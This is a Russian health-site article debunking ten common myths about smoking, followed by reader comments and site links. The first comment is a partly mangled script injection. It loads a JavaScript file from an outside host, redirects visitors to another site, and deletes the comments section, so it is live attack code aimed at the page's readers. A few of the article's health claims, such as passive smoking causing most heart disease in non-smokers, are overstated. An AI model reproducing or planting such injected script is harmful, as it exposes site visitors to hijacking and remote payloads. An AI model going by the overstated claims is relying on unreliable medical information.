Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Топ-10 мифов о курении  >>  Топ-10 мифов о курении
 
Обратная связь
 

Топ-10 мифов о курении

Размер шрифта
19 октября 2016 00:01
  • google_analytics: false
  • Нравится

Никакая другая вредная привычка не плодит столько домыслов и заблуждений, как курение. Многие из них выдуманы самими курильщиками, чтобы как-то оправдать свою зависимость. Так в какие же мифы они верят?

курение

Егор Кошелев / «Здоровье-инфо»

Миф 1. Витамины снижают вред от курения

Да, но только если вы окончательно бросили. Пока курите – риск развития заболеваний сердечно-сосудистой, дыхательной и нервной систем никуда не исчезает. То же самое и с упражнениями. В сочетании с постоянным курением они усугубляют ситуацию.

Миф 2. «Легкие» сигареты безопаснее

Будьте уверены, никотина в «легких» сигаретах достаточно, чтобы поддерживать зависимость от табака на высоком уровне. Более того, чтобы получить необходимую дозу, курильщик вынужден сильнее затягиваться или дольше задерживать в легких дым. Тем самым в организм попадает еще больше никотина и смол.

Миф 3. Курить, не затягиваясь, безвредно

Даже не вдыхая дым, вы все равно находитесь под воздействием смертельно опасных токсинов. Кстати, сигары – лидеры по содержанию смол. Так что ценителям сигар и трубок грозит рак гортани, языка или губы. Да и нагрузка на пищеварительную и сердечно-сосудистую системы не снижается.

Бросишь курить – располнеешь

Миф 4. Бросишь курить – располнеешь

Дело тут не в курении. На самом деле те, кто начал стремительно поправляться после отказа от сигарет, просто-напросто «заедают» стресс – потребляют пищу в ситуациях, когда раньше закуривали. Так что если будете следить за собой и придерживаться здорового питания, лишним килограммам неоткуда будет взяться.

Миф 5. Опасен только никотин

Никотин – мощный яд и наркотик. Именно он вызывает привыкание и заставляет курить снова и снова. Но помимо него в процессе курения в организм попадают около 4000 смертельно ядовитых веществ и 70 канцерогенов. Синильная кислота, метанол, кадмий, аммиак, мышьяк, нитробензол, бутан, уксусная кислота... И это далеко не полный список.

Миф 6. Курение помогает концентрироваться

Отчасти это так. Попадая в организм, никотин стимулирует нервную систему. Но чем больше человек курит, тем сильнее она изнашивается. Постепенно происходит закупорка вен и артерий вредными веществами, возникает кислородное голодание мозга и, в итоге – обратный эффект: потеря концентрации.

Миф 7. Пассивного курения не существует

Пассивное курение представляет немалую угрозу для тех, кто оказался в непосредственной близи от курильщика. В выдыхаемом сигаретном дыме содержание вредных примесей и канцерогенов зашкаливает. Неслучайно пассивное курение – причина большинства случаев заболеваний сердца и рака легких и у некурящих, а у женщин может привести к выкидышу.

Пассивное курение

Миф 8. Здоровье все равно уже не вернешь, значит, и бросать не надо.

Пожалуй, самый глупый миф в нашем рейтинге. Неважно, сколько вам лет, и какого вы пола. Через 2 часа после отказа от курения никотин начинает выводиться из организма. Через 8 часов уровень угарного газа в крови нормализуется. Через 48 часов возвращаются обоняние и вкус. Через 1 месяц уходят одышка и вечная усталость. Через 5 лет риск инфаркта миокарда снижается вдвое. Через 10 лет шансы умереть от рака легких такие же, как и у человека, который никогда не курил. Все эти цифры подтверждены исследованиями. Бросайте курить, берегите здоровье!

Миф 9. Никотин снимает стресс

Наоборот – усиливает. Курение провоцирует резкий выброс адреналина, от которого у человека повышается давление, поднимается уровень сахара в крови и учащается сердцебиение. Никотин и другие вредные вещества ослабляют здоровье человека, делая его более восприимчивым к стрессу.

Миф 10. Все курят. И я курю…

Подавляющая часть человечества уже не курит, и время «я, как все» давно закончилось. Наступает новое время: «я – уникален», «я здоров» и «я – бросил».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:12

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

2 - sherozia

08 апреля 2016 в 20:06

Цитировать   |   Пожаловаться

Все понимают, что курение вредно, но бросить очень тяжело.

Статьи

       
Тяжелые последствия «легких» сигарет   Курение бьет по костям   Как отучить мужчину от курения?   В плену пассивного курения  
31 мая 2011Сегодня - Всемирный день отказа от курения 06 мая 2011Сигареты в Австралии станут «пугающими»
 
12 августа 2011Курящие женщины чаще умирают от инфарктов, чем мужчины 05 июля 2011Никотин только по рецепту
 

Слайдшоу

1
Какие привычки портят вам жизнь?
Как сохранить мозги в 30 лет
Что происходит в теле курящего

Тесты

1
Есть ли у вас остеопороз?
Как контролировать бронхиальную астму
Какая у вас стадия остеохондроза?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.